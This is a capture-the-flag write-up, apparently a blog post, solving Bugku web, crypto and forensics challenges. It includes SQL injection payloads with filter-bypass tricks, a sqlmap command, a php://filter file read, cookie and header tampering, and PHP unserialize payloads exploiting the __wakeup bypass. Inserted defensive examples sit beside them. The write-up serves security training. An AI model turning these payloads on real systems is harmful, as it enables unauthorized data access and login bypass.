newBugku wp

The challenges are really interesting. Ah, I'm such a noob!

web1

extract() variable overwrite; construct:

?a

and that's it.

web2

A speed challenge; script:

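import requests

url = 'http://123.206.31.85:10002/'
s = requests.session()  # one session, so the answer is checked against the question served
req = s.get(url).text
# The arithmetic expression sits between '哦' and the closing </p> tag
a = req.find('哦')
b = req.find('</p>')
exp = req[a+7:b]
# eval() executes the text returned by the server
total = eval(exp)
print(total)
data = {'result': '%d' % total}
final = s.post(url, data)
print(final.text)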

web3

I uploaded a file, but didn't know what to do next.

Noticing op=upload, use the PHP pseudo-protocol (php:// wrapper):

op=php://filter/read=convert.base64-encode/resource=flag

Base64-decode the result.

web4

Use or:

'or 1=1#
asdf

web5

A SQL injection challenge; just run sqlmap against it:

python2 sqlmap.py -u "http://47.95.208.167:10005/?mod=read&id=2" --dump

Or construct an integer-type payload directly:

id=0 union select 1,2,flag,3 from flag

web6

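View the page source; at the very bottom there is

After base64-decoding it, the result is test123

Log in; since this is an administrator system, try the username admin with the password test123

But after clicking log in, the page prompts:

So intercept the request and add an XFF header: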

web7

Intercept the request.

If it is sent unchanged with Go, the response is:

Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3
Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff

Welcome limited user!  你的权限不够!

Hashing admin with MD5 gives:

21232f297a57a5a743894a0e4a801fc3

So change r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff to

r=351e76680321232f297a57a5a743894a0e4a801fc3

Click Go again and the flag is returned.
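
Why the cookie above can be rewritten, and one way to issue it safely, as an added example that is not part of the original write-up. The 10-character prefix split is read off the two cookie values shown; the secret, the session id and the function names are hypothetical.

```python
import hashlib
import hmac

PREFIX_LEN = 10  # both cookies above share the same 10 leading hex characters


def role_digest(cookie):
    """Return the 32-hex-character tail of a u= / r= cookie value."""
    return cookie[PREFIX_LEN:]


def is_plain_md5(cookie, word):
    """True when the tail is the unkeyed MD5 of word, so any client can recompute it."""
    return role_digest(cookie) == hashlib.md5(word.encode()).hexdigest()


def _tag(secret, session_id, role):
    # Keyed MAC over session id and role; the key never leaves the server.
    return hmac.new(secret, f"{session_id}|{role}".encode(), hashlib.sha256).hexdigest()


def issue_role_cookie(secret, session_id, role):
    """Hardened form: the role travels with a MAC bound to this session."""
    return f"{role}.{_tag(secret, session_id, role)}"


def read_role_cookie(secret, session_id, cookie):
    """Return the role only if the MAC verifies, otherwise None."""
    role, _, tag = cookie.partition(".")
    good = _tag(secret, session_id, role)
    # Constant-time comparison on bytes
    return role if hmac.compare_digest(tag.encode(), good.encode()) else None


SECRET = b"constructed-demo-key"  # hypothetical server-side secret
U_COOKIE = "351e76680321232f297a57a5a743894a0e4a801fc3"  # u= value from the response above
```

With the keyed form, swapping the role text or replaying the tag under another session makes `read_role_cookie` return None.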

web8

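Since the age input box only accepts digits, the page source has to be modified a little.

Enter 1^1 and click the update-profile button; after that

So the age field is vulnerable to integer-type injection.

1. Get the current database name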

hex(database())

After updating, it shows

77656238

Converted to characters, this is

web8

2. Get the table names

hex(select group_concat(table_name) from information_schema.tables where table_schema=database())

It reported an update error; only later did I learn that another layer of parentheses has to be added on the outside

hex((select group_concat(table_name) from information_schema.tables where table_schema=database()))

After updating, it shows

7573657273

Converted to characters, this is

users

3. Get the column names

hex((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273))

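After updating, it shows

The data is too large to be displayed in the input box; it appears in the page source below, and converted to characters it is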

id,username,password,nickname,age,description

4. Get the data

Using

hex((select description from users where username=0x61646D696E limit 0,1))

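This statement gives an error... I can't figure out why

I saw a statement posted by an expert in the discussion group and changed it to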

hex((select description from (select * from users where username=0x61646D696E limit 0,1) as b))

That gets the flag, though I still don't understand why the last step has to be constructed this way...

web9

Use a script to submit the content bugku with PUT:

import requests

url = 'http://123.206.31.85:3031/'
# Send 'bugku' as the body of a PUT request
req = requests.put(url, data='bugku')
print(req.text)

Then base64-decode the response.

web11

View the page source; there is a hint in the head tag

Go to robots.txt

User-agent: *
Disallow: /shell.php

So go and look at shell.php

It is a truncated-MD5 problem; a script found online:

import hashlib
from multiprocessing.dummy import Pool as ThreadPool


def md5(s):  # compute the MD5 hex digest of the string form of s
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


keymd5 = input('请输入截断后的md5值')  # known truncated md5 value (the prompt asks for it)
md5start = 0  # offset of the truncated slice given by the challenge
md5length = 6  # length of the truncated slice


def findmd5(sss):  # takes a range "start:end" and tests the md5 of every number in it
    key = sss.split(':')
    start = int(key[0])  # start of the range
    end = int(key[1])  # end of the range
    for i in range(start, end):
        if md5(i)[md5start:md5start + md5length] == keymd5:  # slice matches
            print(i)  # print the matching number
            break


ranges = []  # argument list
for i in range(10):  # start and end of each thread's number range
    ranges.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()  # thread pool
pool.map(findmd5, ranges)  # function and argument list
pool.close()
pool.join()

web12

View the page source

class Time{
    public $flag = ******************;
    public $truepassword = ******************;
    public $time;
    public $password ;
    public function __construct($tt, $pp) {
    $this->time = $tt;
    $this->password = $pp;
    }
    function __destruct(){
        if(!empty($this->password))
        {
            if(strcmp($this->password,$this->truepassword)==0){
                echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
                if(!empty($this->time)){
                    if(!is_numeric($this->time)){
                        echo 'Sorry.<br>';
                        show_source(__FILE__);
                    }
                    else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
                        echo 'you need a bigger time.<br>';
                    }
                    else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
                        echo 'you need a smaller time.<br>';
                    }
                    else{
                        sleep((int)$this->time);
                        var_dump($this->flag);
                    }
                    echo '<hr>';
                }
                else{
                    echo '<h1>you have no time!!!!!</h1><br>';
                }
            }
            else{
                echo '<h1>Password is wrong............</h1><br>';
            }
        }
        else{
            echo "<h1>Please input password..........</h1><br>";
        }
    }
    function __wakeup(){
        $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';
    }
}
if(isset($_GET['rua'])){
    $rua = $_GET['rua'];
    @unserialize($rua);
}
else{
    echo "<h1>Please don't stop rua 233333</h1><br>";
}

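The code consists of the Time class and an if/else statement; the rua parameter has to be passed in and is then unserialized.

The value of password in the Time class is compared with the preset truepassword and has to be equal; since strcmp is used, passing an array bypasses the check. The value of time can be neither greater nor smaller than 66 * 55 * 44 * 33 * 23 * 11, so it simply has to be equal; but there is a sleep call, so use hexadecimal (or scientific notation) to get around it.

How serialization works

type:class-name length:class name:property count:{property type:property-name length:property name;value type:value length:value content}

A bug is exploited here:

__wakeup() magic method bypass (CVE-2016-7124)

When the number of object properties declared in the serialized string is greater than the real number of properties, execution of the __wakeup function is skipped.

Affected versions:

PHP5 < 5.6.25
PHP7 < 7.0.10

Construct: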

?rua=O:4:"Time":4:{s:4:"time";s:10:"0x4c06f350";s:8:"password";a:1:{i:0;i:1;}}

Only two properties need to be constructed; changing the count to four exploits this bug and bypasses __wakeup().

Thanks to the expert's article:
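
A check for the count mismatch described above, as an added example that is not part of the original write-up: it walks the serialized format and compares the declared property count with the properties actually present. The function names are hypothetical, and only scalar, string and array property values are handled (a nested object raises ValueError).

```python
import re


def _head(pattern, buf, pos):
    m = re.compile(pattern).match(buf, pos)
    if m is None:
        raise ValueError("malformed value at offset %d" % pos)
    return m


def _skip_value(buf, pos):
    """Skip one serialized PHP value starting at buf[pos]; return the next offset."""
    kind = buf[pos:pos + 1]
    if kind == b"N":                                   # N;
        return pos + 2
    if kind in (b"i", b"b", b"d"):                     # i:1;  b:0;  d:0.5;
        return buf.index(b";", pos) + 1
    if kind == b"s":                                   # s:<byte length>:"<bytes>";
        m = _head(rb's:(\d+):"', buf, pos)
        end = m.end() + int(m.group(1))
        if buf[end:end + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return end + 2
    if kind == b"a":                                   # a:<n>:{key;value;...}
        m = _head(rb"a:(\d+):\{", buf, pos)
        pos = m.end()
        for _ in range(2 * int(m.group(1))):
            pos = _skip_value(buf, pos)
        if buf[pos:pos + 1] != b"}":
            raise ValueError("array count mismatch at offset %d" % pos)
        return pos + 1
    raise ValueError("unsupported or truncated value at offset %d" % pos)


def object_property_counts(payload):
    """Return (class name, declared count, actual count) for a top-level O: value."""
    m = _head(rb'O:(\d+):"([^"]*)":(\d+):\{', payload, 0)
    pos, actual = m.end(), 0
    while payload[pos:pos + 1] != b"}":
        pos = _skip_value(payload, pos)   # property name
        pos = _skip_value(payload, pos)   # property value
        actual += 1
    return m.group(2).decode(), int(m.group(3)), actual


def declares_extra_properties(payload):
    """True for the CVE-2016-7124 pattern: more properties declared than present."""
    _, declared, actual = object_property_counts(payload)
    return declared > actual


# The value of rua from the write-up above
PAGE_PAYLOAD = b'O:4:"Time":4:{s:4:"time";s:10:"0x4c06f350";s:8:"password";a:1:{i:0;i:1;}}'
```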

https://blog.csdn.net/weixin_42348709/article/details/84895343

web13

The tricky part of this challenge is that the brackets have to be removed from the flag obtained before it is submitted

Script:

import requests
import base64

s = requests.session()

url = 'http://123.206.31.85:10013/index.php'
req = s.get(url)
# The response carries a base64 value in the Password header
flag = req.headers['Password']
flag = base64.b64decode(flag).decode('utf-8')
flag = flag[5:-1]  # drop the first 5 characters and the last one
data = {'password': '%s' % flag}
print(data)
res = s.post(url, data)
print(res.text)
print(res.headers)

web14

I hear quite a lot of things were backed up

Git source leak; scan with GitHack

web18

Sql injection

This challenge is a GET string-type injection with the hash sign # filtered out, but I didn't think of using

--+

as the comment marker -_-

1. Get the table names

?id=0'ununionion seleselectct 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

This gives

ctf,flag

2. Get the column names

?id=0'ununionion seleselectct 1,2,group_concat(column_name) from  infoorrmation_schema.columns where table_name='flag'--+

This gives

id,flag

3. Get the flag

?id=0' ununionion seleselectct 1,2,flag from flag--+
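
Why doubled keywords pass a strip-once filter, next to the parameterized form that does not need one, as an added example that is not part of the original write-up. The blacklist is an assumption inferred from the payloads above; the table layout and flag value are constructed, and SQLite stands in for the challenge's database.

```python
import re
import sqlite3

# Assumption: the filter deletes these keywords once, case-insensitively.
BLACKLIST = ("union", "select", "or")


def strip_once(value):
    """Single-pass keyword removal: text left after a deletion is never re-scanned."""
    for word in BLACKLIST:
        value = re.sub(word, "", value, flags=re.IGNORECASE)
    return value


def make_db():
    """Constructed in-memory stand-in for the challenge database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ctf (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE flag (id INTEGER, flag TEXT);
        INSERT INTO ctf VALUES (1, 'hello', 'world');
        INSERT INTO flag VALUES (1, 'flag{constructed_sample}');
    """)
    return db


def lookup_filtered(db, user_id):
    """Weak form: blacklist filter followed by string concatenation."""
    sql = "SELECT id, title, body FROM ctf WHERE id='" + strip_once(user_id) + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    """Corrected form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT id, title, body FROM ctf WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()


# Third payload from the write-up, with the trailing "+" URL-decoded to a space.
PAYLOAD = "0' ununionion seleselectct 1,2,flag from flag-- "
```

`lookup_filtered(make_db(), PAYLOAD)` returns the row from the flag table, while `lookup_parameterized` returns an empty list for the same input.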

web24

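A scan finds an /index directory; inside it is a code audit, and constructing the unserialize payload is all that is needed

There is a catch here, though: it decodes the input once first, so when constructing the serialized private property the %xx form can no longer be used. Python script: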

import base64

# A private property is serialized as \0ClassName\0property, so a raw NUL byte is needed
a = '0x00'
a = chr(int(a, 16))
payload = 'O:18:"Small_white_rabbit":3:{s:24:"' + a + 'Small_white_rabbit' + a + 'file";s:12:"the_f1ag.php";}'

var = base64.b64encode(payload.encode('utf-8'))
print(var)

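QR code

Open the txt file; it turns out to be a data URI scheme. Paste it into the browser to get the archive password

Extract the archive to get 160 QR codes, and batch-scan them with the Weiwei QR code scanner tool (微微二维码扫码工具); the information can also be obtained from the file sizes

The information obtained ends up in an Excel file, though..

The left column is the file name and the right column the decoded information, which is all 1s and 0s. Sort by file name, delete the first column, then extract the rest with a script: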

f = open('C:\\Users\\腾飞\\Desktop\\a\\a.csv')
a = f.readlines()
b = []
# Strip the newline from every row
for i in a:
    i = i.replace('\n','')
    b.append(i)
# Concatenate the rows into one bit string
s = ''
for i in b:
    s+=i
print(s)

The result is:

0110011001101100011000010110011101111011010100010101001001100011011011110110010001100101001100010111001101010101011100110110010101100110011101010110110001111101

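Then convert it to ASCII in groups of 8 bits

Log audit

Find the traces of the hacker's attack in the log

After downloading and opening it, there are many records:

Searching for the keyword 'flag' turns up some records:

These records are URL-encoded; decode them:

These records come from a SQL injection, so convert the decimal ASCII values used in the injection back to ASCII characters, extracting them with a script: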

data = '''192.168.0.1 - - [13/Oct/2018:12:38:14  0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),1,1))=102-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),2,1))=108-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),3,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),4,1))=103-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),5,1))=123-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),6,1))=109-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),7,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),8,1))=121-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),9,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),10,1))=121-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),11,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),12,1))=104-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),13,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),14,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),15,1))=49-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),16,1))=57-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),17,1))=54-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),18,1))=53-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),19,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),20,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),21,1))=55-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),22,1))=53-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),23,1))=54-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),24,1))=57-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 0000] "GET /flag.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),38,1))=125-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
'''

import re

# Each request tests one character: capture the decimal value between '=' and '--'
a = re.findall('LIMIT.*?=(.*?)--',data)
for i in a:
    i = int(i)
    print(chr(i),end='')

The magical string

There is a magical string bE0veldtTDs7NzlTe3hzbSFYSj5Sa2U6eyQ4NyVrI3FvWFU6Qls7QlVK, and a note with 589164 written on it

First base64-decode it, which gives:

lM/zWmL;;79S{xsm!XJ>Rke:{$87%k#qoXU:B[;BUJ

A very messy string. Thinking of the hint 589164: since base64 is involved, the hint means:

base58,base91,base64

First base91-decode, then base58-decode

Do you really understand how base encodings work?

hint:Python ! Python ! Python! Python!

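So many strings, my computer lagged like crazy!!!!

Then I remembered the hint: I don't have to copy and paste to decode; I can download the ciphertext first, then use functions to read the file and decode it, hehe~

The first encoding is base85; decoding it gives base64, then hexadecimal, then convert to a string, and loop…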

import base64

path = 'C:/Users/腾飞/Desktop/base_python.txt'
with open(path) as f:
    content = f.readlines()[0].strip()

# One round: base85 -> base64 -> hex pairs -> text; the ciphertext nests 10 rounds
for _ in range(10):
    first = base64.b85decode(content).decode('utf-8')
    second = base64.b64decode(first).decode('utf-8')
    content = ''.join([chr(int(b, 16)) for b in [second[i:i+2] for i in range(0, len(second), 2)]])
print(content)

txt500

After reading the writeup I can't understand why the keyword is key rather than flag, why!!!

import os
path = 'C:/Users/腾飞/Desktop/flag/'
keyvalue = input('请输入key: ')  # prompt: enter the keyword to search for
for root, dirs, files in os.walk(path):
    for file in files:
        file = os.path.join(root, file)  # join with root so files in subfolders open too
        f = open(file, 'r')
        content = f.readlines()
        content = ''.join(content)
        f.close()
        if keyvalue in content:
            print(file)

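Enter key{ to get a folder, then open it and search; when submitting, key also has to be replaced with flag..

P.S.: searching with grep on Linux also works

Traffic analysis

Find a record that uses the TCP protocol, then follow the TCP stream

The intercepted telegram

An audio file with ticking sounds, which is Morse code; open it with Audacity, an audio editing and recording program

The narrower bars are . and the wider bars are -; where the gap is large, a space has to be added

This gives

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

Decode the Morse code and submit the flag with its English letters in upper case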

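Avatar

Opened it with 010editor, but found no flag at the head or the tail; after reading the writeup I found that the flag is in the middle? emmm

Press Ctrl+F, choose text, and search for flag

Base-decode the middle part of the flag that was found, then hash it with MD5

Base conversion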

1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331

Looking at the numbers, every digit is smaller than 4, so this is base 4; convert to base 10 first, then to ASCII characters

strings = '1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331'
lists = strings.split(' ')
for i in lists:
    i = int(i, base=4)  # parse each group as a base-4 number
    print(chr(i), end='')

Snake

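This challenge is so vivid

First use foremost to extract the class files, then decompile them with jad; searching the source for flag turns up this piece of code in Game.jad:

        if(score >= 500 && isshow)
        {
            String flag = "eobdxpmbhf\\jpgYaiibYagkc{";
            int key = snake.len - score;    // 3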
            String xx = "";
            for(int i = 0; i < flag.length() / 2; i++)
            {
                char c = flag.charAt(i);
                c ^= key;
                xx = (new StringBuilder(String.valueOf(xx))).append(c).toString();
            }

            for(int i = flag.length() / 2 + 1; i < flag.length(); i++)
            {
                char c = flag.charAt(i);
                c ^= key * 2;
                xx = (new StringBuilder(String.valueOf(xx))).append(c).toString();
            }

            JOptionPane.showInputDialog(null, "This is your flag CALCULATE BY YOUR SCORE:\n", "Congratulations", -1, null, null, xx);
            isshow = false;
        }

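I have never learned Java, but this code is not hard; I looked up the functions I didn't know:

1. The charAt() method returns the character at the given index. The index ranges from 0 to length() - 1


2. StringBuilder is a class that can be used to build strings; the simplest usage:
StringBuilder sb = new StringBuilder();
sb.append("123");
sb.append("456");
String str = sb.toString();
The resulting string str has the value "123456"

3. String.valueOf(b): converts the variable b to a string

The value of key can be worked out in the game: the snake's initial length is 3 and each food eaten adds one to the length, so key is 3

Expressed in Python: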

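flag = "eobdxpmbhf\\jpgYaiibYagkc{"
key = 3
xx = ""
length = len(flag)
# First half: XOR each character with key
for i in range(0, length//2):
    c = ord(flag[i])
    c ^= key
    xx += chr(c)

print(xx)

# Second half (the middle character is skipped, as in the Java loop): XOR with key*2
for i in range(length//2+1, length):
    c = ord(flag[i])
    c ^= key*2
    xx += chr(c)

print(xx)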